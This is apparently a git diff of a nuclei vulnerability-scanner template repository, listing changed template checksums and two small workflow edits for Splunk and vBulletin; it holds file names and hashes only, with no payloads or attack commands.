http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b
|
||||
http/cves/2024/CVE-2024-33724.yaml:cb12817b487797686ea48ef42ff6735b28d3c2a6
|
||||
http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c
|
||||
http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82
|
||||
http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b
|
||||
http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671
|
||||
http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
|
||||
http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda
|
||||
|
|
@ -3409,6 +3440,7 @@ http/default-logins/showdoc/showdoc-default-login.yaml:a3fadb617e0f5eab493196fc3
|
|||
http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdacbcd946cd0cfc8a2
|
||||
http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd
|
||||
http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5
|
||||
http/default-logins/soplanning/soplanning-default-login.yaml:3c498e1990912358f380b450f3d4f18fdfa0ebb1
|
||||
http/default-logins/spectracom/spectracom-default-login.yaml:7c514a27f7ce59eef6cc11b96b71847744a1b2e7
|
||||
http/default-logins/splunk/splunk-default-login.yaml:c004b6e534b8b20e57ee70d52d098be812b99a40
|
||||
http/default-logins/stackstorm/stackstorm-default-login.yaml:0274c411f83fd1b0a84f76713be8f34aec66468c
|
||||
|
|
@ -3669,6 +3701,7 @@ http/exposed-panels/cudatel-panel.yaml:c079445a851e40233a8c56dfda788e5c9b32547b
|
|||
http/exposed-panels/cvent-panel-detect.yaml:a87e443274a8ae60dfeb181ff9e3ab288246d852
|
||||
http/exposed-panels/cwp-webpanel.yaml:9ccee2ed3e4baface4e30a0567b2e46c2976851e
|
||||
http/exposed-panels/cx-cloud-login.yaml:eacbb09b6c7b16b4234ac371e71b2130c738cb5e
|
||||
http/exposed-panels/cyberchef-panel.yaml:53cd896d234ec5f37fa902dfd42e5b07227b7536
|
||||
http/exposed-panels/cyberoam-ssl-vpn-panel.yaml:93abfca996a479f9098e274c3fa5519f6e64f3f9
|
||||
http/exposed-panels/d-link-wireless.yaml:dbcf6912b865faa71a59141e83d00456ce6ceef0
|
||||
http/exposed-panels/dahua-web-panel.yaml:c7b88f6dd9cec15974fab83f071cf7ad63d37ee0
|
||||
|
|
@ -4026,7 +4059,7 @@ http/exposed-panels/movable-type-login.yaml:508709af62f02d5ef93ae76aec1011e33ed9
|
|||
http/exposed-panels/mpftvc-admin-panel.yaml:27d2315c408e5c841b919dd79179b3f258fff0ed
|
||||
http/exposed-panels/mpsec-isg1000-panel.yaml:502b156e58d8ec3d292c50a100686eca248af616
|
||||
http/exposed-panels/ms-adcs-detect.yaml:1ab74132704c2624f19daf5aa4e91de02d43b631
|
||||
http/exposed-panels/ms-exchange-web-service.yaml:255c6cd08b7e42ddc3f05860351b8917ba3c08ba
|
||||
http/exposed-panels/ms-exchange-web-service.yaml:63763b42dba4a1a1a733772a1432013fc9364438
|
||||
http/exposed-panels/mspcontrol-login.yaml:d381675b12cdce4fe5f104c4e3b114387242a74c
|
||||
http/exposed-panels/mybb/mybb-forum-install.yaml:764347d8fe87bdd580b7f5fec9dcc60b90c0aa25
|
||||
http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229031
|
||||
|
|
@ -4111,6 +4144,7 @@ http/exposed-panels/openvpn-connect.yaml:92b51be8820e8d19dcab982f32e889e0ac84fc0
|
|||
http/exposed-panels/openvpn-monitor.yaml:8bdcaa711f6852aeae49b0dde458dd17ed94f146
|
||||
http/exposed-panels/openvpn-router-management.yaml:4c372e21e9ecc176fd0e9edd4fa3195012d17bbf
|
||||
http/exposed-panels/openvz-web-login.yaml:37b140070fa9fc0fc6ff0b5d95fbb7b6dd660aa6
|
||||
http/exposed-panels/openwebui-panel.yaml:796f6949f34bdd706906d64b112519415f6cf396
|
||||
http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8ef54ad683c06
|
||||
http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88
|
||||
http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6
|
||||
|
|
@ -4209,7 +4243,7 @@ http/exposed-panels/rancher-dashboard.yaml:f5b76b896b81d6515e59109cb0feb9e8bcc41
|
|||
http/exposed-panels/rancher-panel.yaml:9f8e5792e4c50bd25d78d974f3c72a7b4c2cc810
|
||||
http/exposed-panels/raspberrymatic-panel.yaml:c5092f2f1d95cf09589e5326cc291b0631391693
|
||||
http/exposed-panels/rcdevs-webadm-panel.yaml:b154e2a68d185946223ae098853f1139d36d9c22
|
||||
http/exposed-panels/rdweb-panel.yaml:ea3373249cad29938b76c9a9e0d15550a918f495
|
||||
http/exposed-panels/rdweb-panel.yaml:ae93f0fd0ec1a86e1272ef68d2e687641a70e945
|
||||
http/exposed-panels/red-lion-panel.yaml:3069a7ec2e960c21c7ebef0e163dfe412ab1688b
|
||||
http/exposed-panels/redash-panel.yaml:b38d3605aea7c194af88114d3333bba9ba3b4f3d
|
||||
http/exposed-panels/redhat/redhat-satellite-panel.yaml:d22be30acc97a640bb0d4469faeec5b57e6602c9
|
||||
|
|
@ -4366,6 +4400,7 @@ http/exposed-panels/tableau-service-manager.yaml:e4dc0c6474aa8a500910b956e054007
|
|||
http/exposed-panels/tailon-panel.yaml:932dd429c4c6c0c653283e1ec18f21c33d1f658a
|
||||
http/exposed-panels/tautulli-panel.yaml:b1e7c47f7d30fd55e28e49a0e08a4f1f2ee075df
|
||||
http/exposed-panels/teamcity-login-panel.yaml:e4a0853683e0c6d7f25e8b4efa8ac9986c3efe68
|
||||
http/exposed-panels/teamforge-panel.yaml:8392c4b73a322e6c548d04f0a329f5920d81fe6a
|
||||
http/exposed-panels/teampass-panel.yaml:b20c18ab358e4afa1b363e71e60469127a91b284
|
||||
http/exposed-panels/tectuus-scada-monitor.yaml:2eb28ad9aac490c62d5a0be1004874ce40bce294
|
||||
http/exposed-panels/tekton-dashboard.yaml:5af9080f654df96d79406a398e81f2a7a8117224
|
||||
|
|
@ -4539,7 +4574,7 @@ http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df
|
|||
http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907
|
||||
http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984
|
||||
http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391
|
||||
http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b
|
||||
http/exposures/backups/settings-php-files.yaml:c3ed4d0da82aebfc6767c6914a17674c995b4f11
|
||||
http/exposures/backups/sql-dump.yaml:ead33d26fe70e2cd7a693b7106740ac4437a4fce
|
||||
http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e
|
||||
http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240
|
||||
|
|
@ -5092,6 +5127,7 @@ http/miscellaneous/apple-app-site-association.yaml:0c900bfd50a6f29041445996ed33a
|
|||
http/miscellaneous/aws-ecs-container-agent-tasks.yaml:8d29db7a82337344e379b72bce008157bd4df961
|
||||
http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d9e5c7e55
|
||||
http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0
|
||||
http/miscellaneous/cloudflare-rocketloader-htmli.yaml:b590d6e588eeb9411fbfc27c87fcf6b695ee63f5
|
||||
http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387
|
||||
http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5
|
||||
http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e
|
||||
|
|
@ -5210,7 +5246,6 @@ http/misconfiguration/clickhouse-unauth-api.yaml:50981e20ce91e8483c828bc8dc08342
|
|||
http/misconfiguration/clockwork-dashboard-exposure.yaml:560363ab2aa0f4ee66a559fcd79af2a25a1ec3f3
|
||||
http/misconfiguration/cloud-metadata.yaml:c830abb35eeddf51f760f450947c00499fcdae28
|
||||
http/misconfiguration/cloudflare-image-ssrf.yaml:571629f99a2171f68d0e62923df20f125663bb22
|
||||
http/misconfiguration/cloudflare-rocketloader-htmli.yaml:5d025c481a102118f4ab9e7a2d834520c6714f82
|
||||
http/misconfiguration/cluster-panel.yaml:a55bbcd24bdcbf255c289f5e865ef63a0b00f6ec
|
||||
http/misconfiguration/cobbler-exposed-directory.yaml:024dc111a55d35d7da4e00e12c15ebb9e28c8303
|
||||
http/misconfiguration/codeigniter-errorpage.yaml:85190ddc7995b4e5a3889743d784c9ff750fa987
|
||||
|
|
@ -5338,6 +5373,7 @@ http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf81728
|
|||
http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251
|
||||
http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99
|
||||
http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a
|
||||
http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b
|
||||
http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea
|
||||
http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a
|
||||
http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e
|
||||
|
|
@ -6440,7 +6476,7 @@ http/takeovers/aha-takeover.yaml:58e3e7a7486be85c7687c793b5663b84759788a8
|
|||
http/takeovers/airee-takeover.yaml:bd00657159494039fc36913d03ddbf767fa1b93b
|
||||
http/takeovers/anima-takeover.yaml:959b664c800ede2e97646180a495f6295d916231
|
||||
http/takeovers/announcekit-takeover.yaml:92fb87a534f3f920e480a963886f8796836c8383
|
||||
http/takeovers/aws-bucket-takeover.yaml:195e8c743d8ae301556d84355e46d6f4b0f5e193
|
||||
http/takeovers/aws-bucket-takeover.yaml:533b13757c82d22d8235f679fadfda0e036d4591
|
||||
http/takeovers/bigcartel-takeover.yaml:6a8f5abf7259eb5f4a4106653fc665b950b4190a
|
||||
http/takeovers/bitbucket-takeover.yaml:60402aa2ecf993deccac40923f21ce71974dc780
|
||||
http/takeovers/campaignmonitor-takeover.yaml:615bfc25c0b488b95d44a0eda7bb5d7af254cacf
|
||||
|
|
@ -6486,8 +6522,9 @@ http/takeovers/smartjob-takeover.yaml:bb0363423b3208375c0c1f61ed48187b90057ee8
|
|||
http/takeovers/smugmug-takeover.yaml:6ea3ec73d535db0f8e87ea40aa458ac44a18f7d0
|
||||
http/takeovers/softr-takeover.yaml:a47cd0392585f45846dbbb70a05574cc564e18e6
|
||||
http/takeovers/sprintful-takeover.yaml:b9b552223b69e1b9086b442307c22de6f8bfa864
|
||||
http/takeovers/squadcast-takeover.yaml:779b3c54dab067369ffa422d108a2de9b81a87b2
|
||||
http/takeovers/strikingly-takeover.yaml:9aa7d5d97af3a23c2eddf1035ba17eea747db30f
|
||||
http/takeovers/surge-takeover.yaml:c3c45bfbe18ad235a9a5a999c73172baf77cdb1f
|
||||
http/takeovers/surge-takeover.yaml:0f7c8583cebc4244dd217376b270cdce848441d4
|
||||
http/takeovers/surveygizmo-takeover.yaml:9f2b0bb8599c05d03d37ce48e1b7ae2bdc92c523
|
||||
http/takeovers/surveysparrow-takeover.yaml:1e8b06deab5ec653168e595223f3eb83bb043796
|
||||
http/takeovers/tave-takeover.yaml:36d44f071b52aad95c3496fd4afeb0c50effd4c2
|
||||
|
|
@ -7487,7 +7524,7 @@ http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml:d2ccf2e6f610a31f1503ed30b074a
|
|||
http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml:28dbb6ff09c477f85b9bb63b572ece60d1f6da94
|
||||
http/vulnerabilities/jenkins/jenkins-script.yaml:d557e9f184eed10b1f1c9d2769ce17b9873bf47f
|
||||
http/vulnerabilities/jenkins/jenkins-stack-trace.yaml:7ebe9434bb86753e39e131e4e69d1f79b279179a
|
||||
http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:8f7dca1421c59002b78381ba8deffb603ab36d04
|
||||
http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:3f864ee1d304a4ea47e603be73b0b193d3764a28
|
||||
http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml:5864d5ddbf7bb775957f9af2c354e278b135e888
|
||||
http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml:ddb4e69fa2143bf694f57a117f26e02f9a0b3db5
|
||||
http/vulnerabilities/jira/jira-servicedesk-signup.yaml:d3ad2f1c3e763757dfc43f44463017a99f5afed4
|
||||
|
|
@ -7547,7 +7584,6 @@ http/vulnerabilities/oscommerce/oscommerce-rce.yaml:d399ad2fe4a2578818466b237382
|
|||
http/vulnerabilities/other/3cx-management-console.yaml:c5ac1f1f2c02e040cb6b80a626c62d1d986e0191
|
||||
http/vulnerabilities/other/74cms-sqli.yaml:5d44180874e39c81ee0cfccd7fb8c273dbbf48d1
|
||||
http/vulnerabilities/other/WSO2-2019-0598.yaml:241773db7836f950b4f63d9578cdcb8e7a43e632
|
||||
http/vulnerabilities/other/academy-lms-xss.yaml:ecc4c96fefc6cf5ceee4cc407bfaf30d654ec5d6
|
||||
http/vulnerabilities/other/accent-microcomputers-lfi.yaml:7b86368e9c0eaabd5a03518d44928f7d54e592d9
|
||||
http/vulnerabilities/other/acme-xss.yaml:e621ea74a2c2237b2407a82b32cf6979899a4584
|
||||
http/vulnerabilities/other/acti-video-lfi.yaml:132a0b28eb29b6078bf02e465d9caedbb8135562
|
||||
|
|
@ -7644,7 +7680,7 @@ http/vulnerabilities/other/graylog-log4j.yaml:78b153f3d47c871e1b5ed10e05d4e34445
|
|||
http/vulnerabilities/other/groomify-sqli.yaml:3f757a7ee830559df2f4d03cd5635e1f5c76b099
|
||||
http/vulnerabilities/other/groupoffice-lfi.yaml:f1295e4d7dc7dd52e038ade2373f4576de55dbf8
|
||||
http/vulnerabilities/other/gsoap-lfi.yaml:aa242baa6456667473b08929ebdd2391ec263823
|
||||
http/vulnerabilities/other/gz-forum-script-xss.yaml:0766b13af3eeaf324edb042b69588a8e02d937f2
|
||||
http/vulnerabilities/other/gz-forum-script-xss.yaml:4f9e19fc198666441fc949361b7e2815bb7e3622
|
||||
http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml:185ebc9353c39517c1963b7755f565f8d2b0ccbb
|
||||
http/vulnerabilities/other/h3c-imc-rce.yaml:2cbd69391843e97f2f3637a982c5ce0314b496bb
|
||||
http/vulnerabilities/other/hanming-lfr.yaml:511265b7bf1fb863ed2ae2d4d1551af5aa110a71
|
||||
|
|
@ -7879,6 +7915,7 @@ http/vulnerabilities/phpmyadmin-unauth.yaml:d15ef415782dbc76f48b70d10f1520819b28
|
|||
http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433
|
||||
http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:1dde1d96626b10652831b3222e3f38f3c894fce4
|
||||
http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:e412881f521a4d5d350da2f825540251c38aabed
|
||||
http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:e66d21a9fdd51c9ccc829ac69c1d63f06181d5c1
|
||||
http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:b4125e258896dd6b614f98e0443fdba778b4ca1a
|
||||
http/vulnerabilities/qibocms-file-download.yaml:c5c1fb9a39ad1d8ac93a8163154bb2887ddf150d
|
||||
http/vulnerabilities/rails/rails6-xss.yaml:b28fc53f49e6d7a89c50a3da233570d3b05199a4
|
||||
|
|
@ -7934,7 +7971,7 @@ http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:03c2c45139f6ccce4cae1593fa60
|
|||
http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:7f769d37fd1e99b8c707f15123f774320cc68a9c
|
||||
http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:293e13f7aa67bd4fab36c4174f5349acfcbc737b
|
||||
http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d829a9f8df913b7baf54effb4c7193d8
|
||||
http/vulnerabilities/titan/titannit-web-ssrf.yaml:2c3d9ff9f823bbe6b104a1b23105182fab34818c
|
||||
http/vulnerabilities/titan/titannit-web-rce.yaml:af49cdd36eb61fde24289ecf35ee9e54ecb5622b
|
||||
http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:237187847805b1973d1d857e6d6d73a392456ad7
|
||||
http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c
|
||||
http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc
|
||||
|
|
@ -7957,6 +7994,7 @@ http/vulnerabilities/ueditor/ueditor-xss.yaml:222e1f2da270e70eb6a8c9a9b57ba955b9
|
|||
http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:3aefc2073f08e855dec0c8146b728b692ce654f2
|
||||
http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:5e3cb2ac4a3259c35592098294ad49ef31b87efe
|
||||
http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml:5565f8dcc7d5ad169422fd7e698c0399f79ab961
|
||||
http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml:286dda2cca7b4e62e4c1a76eed1c5dfcf7d6495d
|
||||
http/vulnerabilities/videoxpert-lfi.yaml:1aa4c4a1048489e9343348c0e436a2917c4edcf9
|
||||
http/vulnerabilities/vmware/vmware-cloud-xss.yaml:4afa16c86c0394c6134840c2745657758b78e063
|
||||
http/vulnerabilities/vmware/vmware-hcx-log4j.yaml:73321afec891e37709b54301889f4d0fddf26e1e
|
||||
|
|
@ -8077,7 +8115,7 @@ http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml:7c640995ee7efa79791af94
|
|||
http/vulnerabilities/wordpress/watu-xss.yaml:7c2e2e4243dc0c7e95c494b365fab550869595f6
|
||||
http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml:20f4513cb63d35b7ad428f8cc0f409efc2c33ee2
|
||||
http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml:57027e142e6204ddd61f5110be2afd3915bcb4dd
|
||||
http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:4f7ab34ae0704143decef88cb3c65b80f19484f6
|
||||
http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:06e5d8c96afa6b5298d67c8c9020693148b77ae0
|
||||
http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml:7c831fd57fcfebd4d567dc1a13f8fa8fafa2b6b2
|
||||
http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml:5baba890d00daae20eb4e5f2dea36d5e1075b3a9
|
||||
http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml:d0893166dea4943ff086abbb4bdad272a134bbd0
|
||||
|
|
@ -8280,7 +8318,7 @@ network/backdoor/backdoored-zte.yaml:42b5ec609229045d3ebbb6e8968a1797413afb44
|
|||
network/c2/darkcomet-trojan.yaml:b8f71af056f9dfd77c24d37df301be7fba986838
|
||||
network/c2/darktrack-rat-trojan.yaml:36425c7572204441890fd6ad0336762658fbe963
|
||||
network/c2/orcus-rat-trojan.yaml:a4c141d7019f20768165f92ac5d4bfc08e8551d9
|
||||
network/c2/xtremerat-trojan.yaml:fa2fa746275c57dc51a7b0ca987f5b1c9783fc79
|
||||
network/c2/xtremerat-trojan.yaml:b2b611a36dec8a18ab75471c7a8429e6952603ca
|
||||
network/cves/2001/CVE-2001-1473.yaml:5374944a926a53026fd02e17333ab21c0fd94115
|
||||
network/cves/2011/CVE-2011-2523.yaml:439f13ea18e52af5b7de1ae93ed2de579a3157c3
|
||||
network/cves/2015/CVE-2015-3306.yaml:89bdabc177692a54c7c144c2c45446b15350f513
|
||||
|
|
@ -8301,7 +8339,7 @@ network/default-login/ftp-anonymous-login.yaml:0eb4d44490e80c5f5f8e7e9e7ecb1fa0c
|
|||
network/default-login/ftp-weak-credentials.yaml:c0cf4a3227435e117de922b08ad77edebf6304a5
|
||||
network/default-login/ldap-anonymous-login.yaml:1d0d2f3485fec11106c15b75166448f9ab047eec
|
||||
network/detection/activemq-openwire-transport-detect.yaml:da59945499ac1f46d9ac606f27d98dd8e1e493d9
|
||||
network/detection/aix-websm-detect.yaml:5f48d15d92ca7cffa357f5b16f8c5953e46566fe
|
||||
network/detection/aix-websm-detect.yaml:a6158ad212ce805f35b16014fdd766fdfd739e37
|
||||
network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529be8b5e
|
||||
network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78
|
||||
network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef
|
||||
|
|
@ -8415,15 +8453,19 @@ network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd
|
|||
network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740
|
||||
network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37
|
||||
profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33
|
||||
profiles/all.yml:da115a47ed611622537dfbbe17e912010916c741
|
||||
profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc
|
||||
profiles/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f
|
||||
profiles/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e
|
||||
profiles/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9
|
||||
profiles/kev.yml:4317bb80617dbbfa0921e3f2164eec962b9d6517
|
||||
profiles/cves.yml:7329a9286f8a79e7caeb008a83003d3714e3141b
|
||||
profiles/default-login.yml:4f58d7f7dcce8c8206816b835cf576a9c7af6d1a
|
||||
profiles/kev.yml:d2a9c9f9667ae3ae7564df6c766db9def45de916
|
||||
profiles/misconfigurations.yml:e755a0f2b337b1b383f027ac5265ebc2799d5e1d
|
||||
profiles/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418
|
||||
profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196
|
||||
profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8
|
||||
profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8
|
||||
profiles/subdomain-takeovers.yml:d8f72d30ae890a9c7c63a6e43fc70e0595c312c2
|
||||
ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa
|
||||
ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91
|
||||
ssl/c2/cobalt-strike-c2.yaml:1d214f56c77fc9fa78872632dc27991220794521
|
||||
|
|
@ -8453,7 +8495,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
|
|||
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
|
||||
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
|
||||
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
|
||||
templates-checksum.txt:5a4967397f87a5e4bf8b4968ee500d7882ef0f51
|
||||
templates-checksum.txt:6daf0c128d534a3887b61c77158735f327eb914e
|
||||
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
|
||||
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
|
||||
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
|
||||
|
|
@ -8606,7 +8648,7 @@ workflows/solarwinds-orion-workflow.yaml:ec752aa58a5ac649b124965ec1f663cb9f65277
|
|||
workflows/solr-workflow.yaml:0bbd2e046f3c7c2c37ed9dcce620d0ca2bf7490a
|
||||
workflows/sonarqube-workflow.yaml:526032eea636a226a0906c69651f74cdeac5b504
|
||||
workflows/sourcebans-workflow.yaml:d20623d3701dc0cd7a563e26e5578e5f7d7abd17
|
||||
workflows/splunk-workflow.yaml:b1a747036b9b4cb038608661da200289734bedad
|
||||
workflows/splunk-workflow.yaml:1a1573714878d4c5d76a44b346850e824d17edc3
|
||||
workflows/springboot-workflow.yaml:863cfba2a94d735ab287e7d73f1c46ebaec87cfd
|
||||
workflows/squirrelmail-workflow.yaml:00c1a831d1483d8c7fb83402cbebfffe7c18feb8
|
||||
workflows/subrion-workflow.yaml:185f05da51ddb75f1d142c6f02aaa9b6f0aa73ba
|
||||
|
|
@ -8626,7 +8668,7 @@ workflows/tongda-workflow.yaml:eb464454bc68a4565f74036769ab5ecb1b5b1b38
|
|||
workflows/tpshop-workflow.yaml:14fc8dbc602229190c2d67273f300d9e73d1915f
|
||||
workflows/traefik-workflow.yaml:87fd8abe8f383d18739dca2ad143e873483391cf
|
||||
workflows/umbraco-workflow.yaml:b256b361df24f4b590f76aaecd23b6f6eb0be729
|
||||
workflows/vbulletin-workflow.yaml:0753e97fa927adfb90e8deaf1530e35c284a2ce2
|
||||
workflows/vbulletin-workflow.yaml:1b365ae481fe4ce3e781fd658085068bec715655
|
||||
workflows/vmware-workflow.yaml:b0438369164f8e2e741b777313d95f9039db6914
|
||||
workflows/voipmonitor-workflow.yaml:0de2f5ad087b16a7bf633884b84ce73746b0ec10
|
||||
workflows/weblogic-workflow.yaml:42703e119505c0196335b5c74c88ecff7eca128a
|
||||
|
|
|
|||
|
|
@ -1,9 +1,9 @@
|
|||
id: splunk-workflow
|
||||
|
||||
info:
|
||||
name: Splink Security Checks
|
||||
name: Splunk Security Checks
|
||||
author: daffainfo
|
||||
description: A simple workflow that runs all Splink related nuclei templates on a given target.
|
||||
description: A simple workflow that runs all Splunk related nuclei templates on a given target.
|
||||
workflows:
|
||||
- template: http/technologies/tech-detect.yaml
|
||||
matchers:
|
||||
|
|
|
|||
|
|
@ -9,6 +9,4 @@ workflows:
|
|||
matchers:
|
||||
- name: vbulletin
|
||||
subtemplates:
|
||||
- template: http/cves/2019/CVE-2019-16759.yaml
|
||||
|
||||
- template: http/cves/2020/CVE-2020-12720.yaml
|
||||
- tags: vbulletin
|
||||
|
|
|
|||
Loading…
Reference in New Issue